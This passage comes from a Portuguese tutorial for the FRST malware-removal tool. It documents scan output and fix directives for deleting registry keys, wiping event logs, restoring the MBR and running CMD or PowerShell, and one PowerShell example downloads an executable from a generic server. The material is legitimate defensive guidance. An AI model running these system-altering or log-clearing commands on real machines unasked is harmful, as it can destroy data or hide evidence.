• No caso de itens nas pastas de início, irá eliminar a chave/valor criado pelo MSCONFIG/TASK MANAGER e mover o a cópia de segurança (backup) feita pelo windows (em sistemas mais antigos) ou o próprio arquivo (nos sistemas mais recentes).

Importante: Corrija apenas uma entrada desta seção se tiver a certeza que é uma entrada relacionada a malware. Se não tiver a certeza acerca da origem da entrada, não a corrija para assim evitar eliminar itens legítimos. No caso de se encontarem itens legítimos desativados e que deveriam estar ativados, o usuário deverá ser instruido para novamente os voltar a ativar através do MSCONFIG/TASK MANAGER.
 
 

Regras da Firewall

Lista FirewallRules, AuthorizedApplications e GloballyOpenPorts.

Exemplo (Windows 10):

FirewallRules: [{E3D59A00-E41A-4AE5-AECF-E7AC117FBF83}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Chao Wei -> ) 
FirewallRules: [{7FEA26C4-3ECE-4431-8FA1-E9AFE7F3B0DD}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation -> Mozilla Corporation)

Exemplo (Windows XP):

StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\bin\FirefoxUpdate.exe] => Enabled:Update service
StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\Firefox.exe] => Enabled:Firefox browser
StandardProfile\GloballyOpenPorts: [2900:TCP] => Enabled:ztdtqhnh

Se uma destas entradas for incluida no fixlist, será eliminada do Registro. Nenhum arquivo será movido.


 Pontos de Restauração - Consulte a seção Pontos de Restauração acima neste tutorial.

Lista os Pontos de Restauração disponíveis, no seguinte formato:
 

18-04-2016 14:39:58 Windows Update
18-04-2016 22:04:49 Restore Point Created by FRST

As funções desativadas serão reportadas:

ATENÇÃO: A Restauração do Sistema está desabilitada (Total:59.04 GB) (Free:43.19 GB) (73%)

Nota: A entrada é referente ao Sistema de Restauração desativado de forma padrão. O Sistema de Restauração Desativado através da Diretiva de Grupo (Group Policy) será reportada no FRST.txt (debaixo da seção Registro). Em ambos os casos, o Sistema de Restauração pode ser automaticamete ativado. Veja a diretiva SystemRestore:.

 
Dispositivos Apresentando Falhas No Gerenciador

Exemplo:

Nome: bsdriver 
Descrição: bsdriver 
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} 
Fabricante: 
Serviço: bsdriver 
Problema: : Este dispositivo não está presente, não está funcionando corretamente ou não tem todos os seus drivers instalados. (Code 24) 
Resolução: O dispositivo está instalado incorretamente. O problema pode ser uma falha de hardware ou um novo driver pode ser necessário. 
Os dispositivos permanecem neste estado se tiverem sido preparados para a remoção. 
Depois de remover o dispositivo, este erro desaparece. Remova o dispositivo e este erro deve ser resolvido.

 
Registo de erros de evento:

• Erros de Aplicação
• Erros de Sistema
• Erros de Integridade de Código
• Erros e avisos do Windows Defender

 

Informação da Memória - Consulte a seção Informação sobre a Memória acima neste tutorial.
 

Drives (Unidades/Discos)
 

MBR & Tabela de Partição - Consulte a seção MBR & Tabela de Partição, acima neste tutorial.

 

[Lusitano]

Outras Análises Opcionais

Análises Opcionais

Ao marcar a caixa Análise Opcional, FRST irá analisar os itens solicitados.


Lista BCD

Os Dados de Configuração de Arranque são listados.


SigCheckExt

Esta seção lista todos os arquivos .exe e .dll nas pastas padrão. O resultado de saída tem mesma forma que são listados na lista Um Mês.


Shortcut.txt

Lista todos os tipos de atalhos de todas as contas padrão. Entradas sequestradas podem ser incluídas no fixlist para serem restauradas ou eliminadas.

Exemplo:

Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors) 
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors) 
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors) 

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% 
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336" 
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%

Para corrigir as linhas ShortcutWithArgument:, copie e cole as linhas para dentro do fixlist. Mas para remover os objetos Shortcut:, adicione em separado os caminhos correspondentes aos arquivos.

Um script completo, deverá ser semelhante a isto:

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% 
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336" 
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% 
C:\Program Files (x86)\jIxmRfR 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 
C:\Users\Public\Desktop\Google Chrome.lnk 
C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

Nota: FRST elimina o argumento dos atalhos, exceto os atalhos do Internet Explorer (No Add-ons).lnk. De forma padrão o argumento deste atalho não está vazio ( o argumento é -extoff) e é utilizado para executar o Internet Explorer sem complementos (add-ons). E é vital para poder solucionar incidências que afetem o IE, por isso este argumento de atalho será restaurado.

Deve também ter em conta que se executa outra ferramenta que elimine este argumento do Internet Explorer (No Add-ons).lnk, FRST não o irá listar em ShortcutWithArgument: e portanto o argumento não poderá ser restaurado com o FRST. Neste caso, o usuário pode restaurar o argumento manualmente.

Para restaurar manualmente o argumento, o usuário deverá ir a localização do arquivo Internet Explorer (No Add-ons).lnk:

Clique direito do mouse e selecionar Propriedades.

Na caixa Destino, adicionar dois espaços e depois -extoff ao caminho mostrado.

Clicar em Aplicar e Aceitar.

Arquivos 90 Dias

Quando a opção arquivos 90 dias é marcada, FRST irá listar Três meses (Criado/Modificado), em vez de Um mês (Criado/Modificado).
 

Funções de Pesquisa

Pesquisar Arquivos

Existe um botão denominado Pesquisar Arquivos na Consola do FRST. Para pesquisar arquivos, pode escrever o copiar e colar os nomes que desejar pesquisar na caixa de pesquisa. Caracteres curingas, são permitidos. Se necessitar de pesquisar mais do que um arquivo, os nomes dos arquivos devem ser separado por ponto e vírgula.

termo;termo

 

*termo*;*termo*

Quando o botão pesquisar arquivos é pressionado, o usuário é informado que a pesquisa foi iniciada, uma barra de progresso é mostrada e finalmente uma mensagem indicando que a pesquisa está completa. Um arquivo Search.txt é gerado e guardado na mesma localização do FRST.

Os arquivos encontrados, são listados junto com a sua data de criação, data de modificação, tamanho, atributos, nome da empresa, MD5 e assinatura digital, no seguinte formato:

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.15063.608_none_2ad0781c8951a362\dnsapi.dll 
[2017-03-18 22:57][2017-03-18 22:57] 000661224 _____ (Microsoft Corporation) 0F9FA6A2D4EAE50393DCE473759A9845 [Arquivo não assinado]

A funcionalidade de pesquisa de arquivos está limitada a unidade do sistema. Em alguns casos, falta um arquivo legítimo do sistema ou está corrompido, causando problemas no arranque (boot) e não há um arquivo de substituição no sistema. Quando a funcionalidade Pesquisar Arquivos é executada em Modo de Recuperação (Win Vista e posteriores versões) a pesquisa também inclui os arquivos em X: (a unidade de inicialização virtual). Em alguns casos, isto pode ser um "salva-vidas". Um exemplo de um services.exe em falta que pode ser copiado de X:\Windows\System32 para C:\Windows\System32.

Nota: A unidade X: apenas irá conter executáveis de 64 bits para sistemas de 64 bits.

O botão Pesquisar Arquivos pode ser usado para realizar pesquisas adicionais, veja  abaixo FindFolder: e SearchAll:. Os resultados serão guardados no Search.txt.


Pesquisar Registro

Existe um botão Pesquisar Registro na consola do FRST. Pode digitar ou copiar e colar os nomes dos itens que deseja pesquisar dentro da caixa Pesquisar. Se você desejar mais do que um item, os nomes devem ser separados por ponto e vírgula.

Quote

termo;termo

Ao contrário do que ocorre na pesquisa de arquivos, ao realizar uma pesquisa no Registro, deve-se evitar adicionar carateres curinga á pesquisa, porque esses carateres serão literalmente interpretados. Quando é adicionado um desses carateres ("*" ou "?") no início ou final do nome, FRST irá ignorá-lo e pesquisar o nome sem esse carater curinga.
 
O arquivo SearchReg.txt irá ser salvo na mesma localização do FRST.

Nota: A função Pesquisar Registro só funciona quando executada fora do Ambiente de Recuperação.


Pesquisar Pasta

Para pesquisar pastas na unidade do sistema, introduza a seguinte sintaxe na caixa de pesquisa e pressione o botão Pesquisar Arquivos:

FindFolder: termo;termo

Carateres Curinga são admitidos:

FindFolder: *termo*;*termo*

Pesquisar Tudo

Para executar uma pesquisa completa (arquivos, pastas, Registro) de um ou mais itens, introduza a seguinte sintaxe na caixa de pesquisa e pressione o botão Pesquisar Artigos:

SearchAll: termo;termo

Não adicione carateres curinga aos nomes. FRST automaticamente irá interpretar os nome(s) como *nome(s)* no caso de arquivos e pastas.

Nota: A pesquisa total executada em Modo de Recuperação, está limitada aos arquivos e pastas.

 

[Lusitano]

Diretivas/Comandos

 Todos os comandos/diretivas no FRST devem ser colocados linha a linha, já que o FRST processa o script linha a linha.

Breve referência das Diretivas/Comandos
 

Nota: As Diretivas/Comandos não distinguem maiúsculas de minúsculas (case sensitive).
 

Para uso exclusivo em Modo Normal

 

CreateRestorePoint:
SystemRestore:
TasksDetails:


Para uso em Modo Normal e Modo Seguro

CloseProcesses:  

EmptyEventLogs:
EmptyTemp:  
Powershell:
Reboot:  
RemoveProxy:
StartPowershell: — EndPowershell:
VirusTotal:  
Zip:  


Para uso em Modo Normal, Modo Seguro e Modo de Recuperação

cmd:  

Comment:
Copy:
CreateDummy:
DeleteJunctionsInDirectory:
DeleteKey: e DeleteValue:
DeleteQuarantine:
DisableService:
ExportKey: e ExportValue:  
File:
FilesInDirectory: e Folder:  
FindFolder:  
Hosts:
ListPermissions:
Move:
Reg:   
RemoveDirectory:
Replace:
RestoreQuarantine:  
SaveMbr:
SetDefaultFilePermissions:
StartBatch: — EndBatch:  
StartRegedit: — EndRegedit:

Symlink:
testsigning on:
Unlock:


Para uso exclusivo em Modo de Recuperação (RE)

LastRegBack:
RestoreFromBackup:
RestoreMbr:
    

Exemplos de uso
 
CloseProcesses:

 

Encerra todos os processos não essenciais. Ajuda para as correções serem mais efetivas e mais rápidas.

Quando esta diretiva é incluída no fix, irá automaticamente aplicar um reinício (reboot). Não é necessário incluir a diretiva Reboot:. A diretiva CloseProcesses: não é necessária e não está disponível no Modo de Recuperação.


CMD:

Ocasionalmente, irá necessitar de utilizar o comando CMD. Nestes casos, deverá utilizar a diretiva "CMD":

CMD: comando

Caso haja a necessidade de usar mais do que um comando, comece cada uma dessa linhas com CMD: para obter um registo de saída de cada comando.
Exemplo:

CMD: copy /y c:\windows\minidump\*.dmp e:\ 
CMD: bootrec /FixMbr

O primeiro comando irá copiar os arquivos minidump para a unidade flash (Se a letra da unidade flash for E).

O segundo comando é utilizado para corrigir o MBR no Windows Vista e posteriores versões.

De maneira alternativa, poderia-se utilizar as diretivas StartBatch: — EndBatch: (veja mais abaixo)
 
Nota: Ao contrário das diretivas FRST nativas ou outras, os comandos cmd devem ter a sintaxe cmd.exe precisa, portanto, por exemplo, os carateres de aspas duplas (“) devem ser incluídos quando houver um espaço no caminho / pastas do arquivo que precisa deles.
 

Comment:

Adiciona uma nota para fornecer feedback sobre o conteúdo do Fixlist.

Exemplo:

Comment: O comando seguinte irá remover todos os proxies de rede do sistema
RemoveProxy:

 

 

Copy:

Para copiar arquivos ou pastas similar a xcopy.

A sintaxe é a seguinte:

Copy: arquivo de origem / pasta de destino

A pasta de destino irá ser automaticamente criada (caso não exista).
Exemplo:
 

Copy: C:\Users\User\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb C:\Users\User\Desktop\Edge Backup
Copy: C:\Windows\Minidump F:\

Nota: Para substituir arquivos individuais, é recomendado utilizar a diretiva Replace:. No caso de arquivo que já exista a diretiva Copy: irá tentar reescrever o arquivo, enquanto a diretiva Replace: tenta desbloquear o arquivo e mover o arquivo para a Quarantine.


CreateDummy:

Cria um arquivo/pasta fictício/bloqueado para prevenir um possível Restauração de um arquivo/pasta malicioso. O arquivo ou pasta fictício/bloqueado (dummy) deverá ser removido após a neutralização do malware.

A sintaxe é:

CreateDummy: caminho

Exemplo:

CreateDummy: C:\Windows\System32\malware.exe 
CreateDummy: C:\ProgramData\Malware

 

CreateRestorePoint:

Para criar um ponto de Restauração.

Nota: Esta diretiva apenas funciona em Modo Normal. Não irá funcionar quando o Sistema de Restauração esteja desativado.


DeleteJunctionsInDirectory:

Para eliminar junções, utilize a seguinte sintaxe:

DeleteJunctionsInDirectory: caminho

Exemplo:

DeleteJunctionsInDirectory: C:\Program Files\Windows Defender

 
DeleteKey: e DeleteValue:

A forma mais eficiente de eliminar chaves/valores, evitando as limitações dos algoritmos padrão de eliminação presentes em Reg: e StartRegedit: — EndRegedit:.

A sintaxe é:

1. Para as chaves:

DeleteKey: chave

Em alternativa, o formato regedit pode ser usado:

[-chave]

2. Para os valores:

DeleteValue: chave|valor

Se o valor é um valor padrão, deixe o nome do valor vazio:

DeleteValue: chave|

Exemplo:

DeleteKey: HKLM\SOFTWARE\Microleaves 
DeleteValue: HKEY_CURRENT_USER\Environment|SNF 
DeleteValue: HKU\S-1-5-21-3145329596-257967906-3285628945-1000\Software\Clients\StartMenuInternet| 
[-HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Dataup]

As diretivas têm a capacidade de eliminar chaves/valores que estejam bloqueadas devido a permissões insuficientes, chaves/valores que contenham incorporados carateres nulos e ligações simbólicas de Registro. Não existe a necessidade de utilizar a diretiva Unlock:.

Para as chaves/valores que estão protegidas por um software em execução (Resposta: Acesso negado), deverá ser utilizado o Modo Seguro (para contornar o software em execução) ou eliminar os componentes principais antes de utilizar os comandos.

Nota: Se a chave incluída para ser eliminada é uma ligação de Registro para outra chave, a chave (origem) que é a ligação de Registro simbólica, será eliminada. A chave (alvo) não será eliminada. Isto, para que evitar a remoção de uma ligação simbólica de Registro malicioso que pode apontar para uma chave legítima e a própria chave legítima. Em caso em que a chave de origem e a chave de destino são maliciosas ou estão incorretas, ambas devem ser listadas para serem eliminadas.


DeleteQuarantine:

Após finalizar a limpeza, a pasta %SystemDrive%\FRST (geralmente C:\FRST) criada pela ferramenta FRST deverá ser removida do computador. Em alguns casos a pasta não pode ser removida manualmente porque a pasta %SystemDrive%\FRST\Quarantine contém arquivos ou diretorios incomuns de malware. O comando DeleteQuarantine:, irá remover a pasta Quarantine.
As ferramentas que movem arquivos em vez de eliminar os arquivos, não deverão ser usadas para eliminar C:\FRST, já que essas ferramentas simplesmente movem os arquivos para o seu próprio diretorio e assim sendo, eles permanecem no sistema.

Nota:  A desinstalação automática do FRST (veja a descrição em Introdução) inclui a mesma capacidade disponível para eliminar a pasta Quarantine bloqueada.
 

DisableService:

Para desativar um serviço ou controlador de serviço, pode usar o seguinte script:

DisableService: NomeServiço

Exemplo:

DisableService: sptd 
DisableService: Wmware Nat Service

FRST irá desabilitar o serviço e ele não será iniciado no próximo arranque (boot) do sistema.

Nota: O nome do serviço deverá ser incluído exatamente da mesma forma que aparece no Registro ou no resultado do FRST, sem nada ser adicionado. Por exemplo as aspas não são necessárias.

 

EmptyEventLogs:

Limpa os logs de eventos do Windows. O número total de registros excluídos e eventuais erros serão exibidos.

 

EmptyTemp:

Os seguintes diretórios são esvaziados:

• Arquivos Temporários do Windows
• Pastas Temporárias dos Usuários
• Cache; armazenamento HTML5, Cookies e Histórico dos navegadores analisados pelo FRST, exceto os clones do Firefox.
• Cache dos arquivos abertos recentemente
• Cache do Discord
• Cache do Java
• Cache do Steam HTML
• Cache de ícones e miniaturas do Explorador
• Fila de transferência BITS (arquivos qmgr.db e qmgr*.dat)

• Cache WinHTTP AutoProxy

• Cache DNS

• Reciclagem

Quando a diretiva EmtpyTemp: é utilizada, o sistema irá ser reiniciado após o fix (correção). Não é necessário utilizar a diretiva Reboot:.
Também não importa se EmptyTemp: é adicionado no início, meio ou fim do fixlist, irá sempre ser executado depois de todas as outras linhas serem processadas.

Importante: Quando a diretiva EmptyTemp é usada, os itens são eliminados permanentemente e não movidos para a Quarantine.

Nota: A diretiva está desabilitada no Modo de Recuperação para prevenir danos no sistema.


ExportKey: e ExportValue:
 
É o método mais confiável de inspecionar o conteúdo de uma chave. Estas duas diretivas superam algumas limitações do regedit.exe e reg.exe. A diferença entre as diretivas é no âmbito da exportação. ExportKey: lista os valores e sub-chaves recursivamente, enquanto ExportValue: apenas mostra os valores da chave.

A sintaxe é:

ExportKey: chave

 

ExportValue: chave

Exemplo:

ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Chave Suspeita

================== ExportKey: =================== 

[HKEY_LOCAL_MACHINE\SOFTWARE\Chave Suspeita] 
[HKEY_LOCAL_MACHINE\SOFTWARE\Chave Suspeita\ChaveInválida ] 
"Valor Oculto"="Dados Ocultos" 
[HKEY_LOCAL_MACHINE\SOFTWARE\Chave Suspeita\ChaveTrancada] 
HKEY_LOCAL_MACHINE\SOFTWARE\Chave Suspeita\ChaveTrancada => Acesso Negado. 

=== Fim de ExportKey ===

Nota: A exportação está destinada apenas para fins de investigação e não pode ser utilizada para operações de cópia de segurança e importações.
 

 

File:

 

Para verificação das propriedades dos arquivos. Podem ser incluídos vários arquivos, separados por ponto e vírgula.

File: caminho;caminho

Nota: Para mais de 4 arquivos, utilize uma única diretiva com delimitador ponto e vírgula, em vez de várias diretivas, para garantir que todas as ligações disponíveis ao VirusTotal serão mostradas.

Exemplo:

File: C:\Users\User\AppData\Roaming\Pcregfixer\PCREGFIXER\background\wmplayer.exe

========================= File: C:\Users\User\AppData\Roaming\Pcregfixer\PCREGFIXER\background\wmplayer.exe ======================== 

Arquivo não assinado 
MD5: 4793A9663376EF3A9044E07A9A45D966 
Data de criação e modificação: 2017-07-30 12:04 - 2017-07-30 12:04 
Tamanho: 000242688 
Atributos: ----A 
Nome da Empresa: 
Nome Interno: wmplayer.exe 
Nome Original: wmplayer.exe 
Produto: Windows Media Player 
Descrição: Windows Media Player 
Versão do Arquivo: 1.0.0.0 
Versão do Produto: 1.0.0.0 
Direitos de Autor: Copyright © 2017 
VirusTotal:https://www.virustotal.com/file/8eb7326be9966a76b83c3497109a147bce7237e72940680642b4ca02f9089ed9/analysis/1503093556/ 

====== Fim de File: ======

Nota: A verificação da assinatura digital não está disponível em Modo de Recuperação.

Nota: A diretiva File: não providencia um upload automático para o VirusTotal, tal como acontece na diretiva VirusTotal:.
 

 FilesInDirectory: e Folder:
 
Serve para verificar o conteúdo de uma pasta. FilesInDirectory: está destinado a listar arquivos específicos que coincidam com um ou mais padrões curinga *, enquanto Folder: está destinado para obter todo o conteúdo da pasta. O resultado de ambas as diretivas incluem as somas de verificação MD5 (para todos os arquivos) e assinaturas digitais (para arquivos .exe, .dll, .sys and .mui).

A sintaxe é:

FilesInDirectory: caminho\padronizar;padronizar

 

Folder: caminho

Exemplo:

FilesInDirectory: C:\Windows\desktop-7ec3qg0\*.exe;*.dll 
Folder: C:\Windows\desktop-7ec3qg0

Nota: A diretiva Folder: funciona de forma recursiva e lista o conteúdo de todas as sub-pastas. Portanto, pode gerar resultados enormes.


FindFolder:
 
Veja Funções de Pesquisa em Outras Análises Opcionais. Esta diretiva funciona da mesma forma que a FindFolder: na caixa de pesquisa, mas os resultados são gravados no Fixlog.txt.

 

 

Hosts:

Para restabelecer o arquivo hosts. Consulte também a seção hosts na Análise Principal (FRST.txt).


ListPermissions:

Utiliza-se para listar as permissões nos arquivos/diretorias/chaves incluídas no script.

ListPermissions: caminho/chave

Exemplo:

ListPermissions: C:\Windows\Explorer.exe 
ListPermissions: C:\Users\User\appdata 
ListPermissions: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip 
ListPermissions: HKLM\SYSTEM\CurrentControlSet\services\afd

Move:

Por vezes, renomear ou mover um arquivo, especialmente quando se realiza entre unidades/discos, pode ser problemático e o comando MS Rename pode falhar. Para mover ou renomear um arquivo, utilize o seguinte script:

Move: destino fonte

Exemplo:

Move: c:\WINDOWS\system32\drivers\afd.sys c:\WINDOWS\system32\drivers\afd.sys.old 
Move: c:\WINDOWS\system32\drivers\atapi.bak c:\WINDOWS\system32\drivers\atapi.sys

A ferramenta move o arquivo de destino (caso exista) para a Quarantine e em seguida, move o arquivo de origem para o local de destino.

Nota: Renomear um arquivo pode ser feito utilizando a diretiva Move:

Nota: O caminho de destino deverá conter o nome do arquivo, mesmo se o arquivo estiver faltando no diretório de destino.


Powershell:

Para executar comandos PowerShell ou arquivos de script.

1. Para executar apenas um comando PowerShell independente e obter o resultado no Fixlog.txt, a sintaxe é:

Powershell: comando

Exemplo:

Powershell: Get-Service

2. Para executar apenas um comando PowerShell independente e obter o resultado em um arquivo texto (e não no Fixlog.txt), utilize operadores de redirecionamento ou o Out-File cmdlet:

Powershell: comando > "Caminho para arquivo texto"

 

Powershell: comando | Out-File "Caminho para arquivo texto"

Exemplo:

Powershell: Get-Service > C:\log.txt 
Powershell: Get-Process >> C:\log.txt

3. Para executar arquivo script previamente preparado (.ps1) contendo um ou mais comandos/linhas PowerShell, a síntaxe é:

Powershell: "Caminho para arquivo script"

Exemplos:

Powershell: C:\Users\NomeUsuário\Desktop\script.ps1

 

Powershell:"C:\Users\Nome do Usuário\Desktop\script.ps1"

4. Para executar vários comandos/linhas como se estivessem dentro de um arquivo script (.ps1), mas sem ter criado o arquivo .ps1, utilize ponto e vírgula para separá-los, em vez de utilizar mudança de linha.

Powershell: linha 1; linha 2; (e assim sucessivamente)

Exemplo:

Powershell: $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile(“http://server/file.exe", “C:\Users\User\Desktop\file.exe”)

De forma alternativa, podiam ser utilizadas as diretivas StartPowershell: — EndPowershell: (veja mais abaixo).
 

Reboot:

Para forçar um reinício (reboot).

Não faz diferença em que parte do fixlist coloca. Mesmo que coloque no início, o reinício (reboot) será apenas executado após todos os outros processos do fixlist estarem completos.

Nota: Este comando não irá funcionar no Modo de Recuperação, por não ser necessário.


Reg:

Serve para manipular o Registro do Windows, utilizando a ferramenta de linha de comandos Reg.

A sintaxe é:

Reg: comando reg

Exemplo:

Reg: reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v Start /t REG_DWORD /d 0x2 /f 
Reg: reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" C:\Users\User\Desktop\backup.reg

Nota: Ao contrário das diretivas nativas FRST, o comando Reg deve ter a adequada sintaxe reg.exe., como por exemplo o uso de aspas ", no caso de existerem espaços no nome Chave/Valor.
 
Nota: A diretiva não irá processar chaves/valores bloqueados ou inválidos. Consulte as seções DeleteKey: e DeleteValue:, anteriormente descritas neste tutorial.


RemoveDirectory:

Para eliminar (e não mover para a Quarantine) diretorios com permissões limitadas ou caminhos e nomes inválidos. Não é necessário usar a diretiva Unlock:. A diretiva RemoveDirectory: deverá ser utilizada para diretorios que resistam á habitual operação de movê-los. Se for utilizada em Modo Seguro, será muito poderosa e utilizada em Modo de Recuperação será ainda mais poderosa.

O script será:

RemoveDirectory: caminho

RemoveProxy:

Elimina algumas configurações das políticas de restrição do Internet Explorer como ""HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" ou ProxySettingsPerUser em HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings. Elimina os valores do computador e das chaves do usuário "ProxyEnable" (se estiver estabelecido em 1), "ProxyServer", "AutoConfigURL", "DefaultConnectionSettings" e "SavedLegacySettings". Também aplica o comando BITSAdmin com NO_PROXY.

Adicionalmente, elimina o valor padrão da chave "HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies", se estiver alterada.

Nota: Quando houver um serviço ou software em execução que restaure estas configurações, esse software deverá ser desinstalado e o serviço deverá ser removido antes de usar a diretiva. Isto é para assegurar que a configuração proxy não retorne.


Replace:

Para substituir um arquivo, utilize o seguinte script:

Replace: origem de destino

Exemplo:

Replace: C:\WINDOWS\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_cf8ff0d2c0eeb431\dnsapi.dll C:\WINDOWS\system32\dnsapi.dll 
Replace: C:\WINDOWS\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_d9e49b24f54f762c\dnsapi.dll C:\WINDOWS\SysWOW64\dnsapi.dll

A ferramenta move o arquivo de destino (caso exista) para Quarantine e em seguida, copia o arquivo de origem para o local de destino.

Não irá mover o arquivo fonte se ainda estiver na sua localização original. Assim, no exemplo acima, o arquivo dnsapi.dnll irá permanecer na diretoria WinSxS.

Nota: O caminho de destino deverá conter o nome do arquivo mesmo se o arquivo estiver faltando no diretório de destino.
 

Nota: Em caso de diretório de destino ausente, o comando irá falhar. FRST não reconstrói a estrutura completa do diretório. Em alternativa, poderia utilizar a diretiva Copy:.


RestoreFromBackup:

Na primeira vez em que a ferramenta é executada, copia como cópia de segurança (backup) as chaves de Registro para o diretório SystemDrive%\FRST\Hives (habitualmente C:\FRST\Hives). Este backup não será substituído pelas seguintes execuções da ferramenta, a não ser que o backup tenha mais de dois meses. Caso algo dê errado, qualquer chave poderá ser restaurada. A sintaxe será:

RestoreFromBackup: HiveNome

Exemplos:

RestoreFromBackup: software 
RestoreFromBackup: system

RestoreMbr:

Para restaurar o MBR, FRST irá utilizar MbrFix que deverá ser salvo em uma unidade flash junto com o arquivo MBR.bin a restaurar. Será necessária o utilitário MbrFix/MbrFix64, o arquivo MBR.bin a restaurar e o script que mostra a unidade:

RestoreMbr: Drive=#

Exemplo:

RestoreMbr: Drive=0

Nota: O MBR a ser restaurado deverá ser nomeado de MBR.bin, comprimido (zipado) e anexado.


RestoreQuarantine:

Pode restaurar todo o conteúdo da Quarantine (Quarantine) ou apenas restaurar um arquivo/pasta ou diversos arquivos/pastas da Quarantine.

Para restaurar todo o conteúdo da Quarantine (Quarantine), a sintaxe é:

RestoreQuarantine:

Ou:

RestoreQuarantine: C:\FRST\Quarantine

 

 

Para restaurar um arquivo ou pasta, a sintaxe é:

RestoreQuarantine: CaminhoNaQuarantine

Exemplo:

RestoreQuarantine: C:\FRST\Quarantine\C\Program Files\Microsoft Office 
RestoreQuarantine: C:\FRST\Quarantine\C\Users\User\Desktop\ANOTB.exe.xBAD

Para encontrar o caminho na Quarantine, pode utilizar:

Folder: C:\FRST\Quarantine

Ou:

CMD: dir /a/b/s C:\FRST\Quarantine

Nota: Se o arquivo já existe (fora da Quarantine) no caminho de destino, FRST não irá sobrescrever o arquivo. O arquivo original não será movido e permanecerá na Quarantine. No entanto, poderá ter de restaurar o arquivo desde a Quarantine, mas antes deverá renomear/eliminar o arquivo que se encontra no caminho de destino.

 

 

SaveMbr:

Consulte a seção Unidades/Discos & Tabela de Partição neste tutorial.

Para criar uma cópia do MBR, utiliza-se a seguinte sintaxe:

SaveMbr: Drive=#

Exemplo:

SaveMbr: Drive=0

Nota: A execução desse script criará um arquivo MBRDUMP.txt na unidade flash, que o usuário deve anexar na resposta.


SetDefaultFilePermissions:

Comando criado para os arquivos/pastas do sistema bloqueados. Estabelece o grupo "Administradores" como proprietário e dependendo do sistema, garante direitos de acesso aos grupos padrão.

Nota: Esta diretiva não irá estabelecer TrustedInstaller como proprietário, mas ainda pode ser usado para arquivos/pastas de sistema bloqueados pelo malware.

O script será:

SetDefaultFilePermissions: caminho

StartBatch: — EndBatch:

Para criar e executar arquivos .bat

A sintaxe é:

StartBatch: 
Linha 1 
Linha 2 
Etc. 
EndBatch:

O resultado será reportado no Fixlog.txt
 

StartPowershell: — EndPowershell:

Uma melhor alternativa para criar e executar arquivos PowerShell: que contenham várias linhas (consulte a seção PowerShell acima neste tutorial.)
 
A sintaxe é:

StartPowershell: 
Linha 1 
Linha 2 
Etc. 
EndPowershell:

O resultado será reportado no Fixlog.txt


StartRegedit: — EndRegedit:
 
Para criar e importar arquivos de Registro (.reg).
 
A sintaxe é:

StartRegedit: 
arquivo em formato .reg 
EndRegedit:

Incluir o cabeçalho Windows Registry Editor Version 5.00 é opcional, mas o cabeçalho REGEDIT4 é necessário.
 
Exemplo:

StartRegedit: 
Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MpsSvc] "Start"=dword:00000002 
EndRegedit:

Irá obter a confirmação no Fixlog.txt:

Registry ====> A operação foi concluída com sucesso.

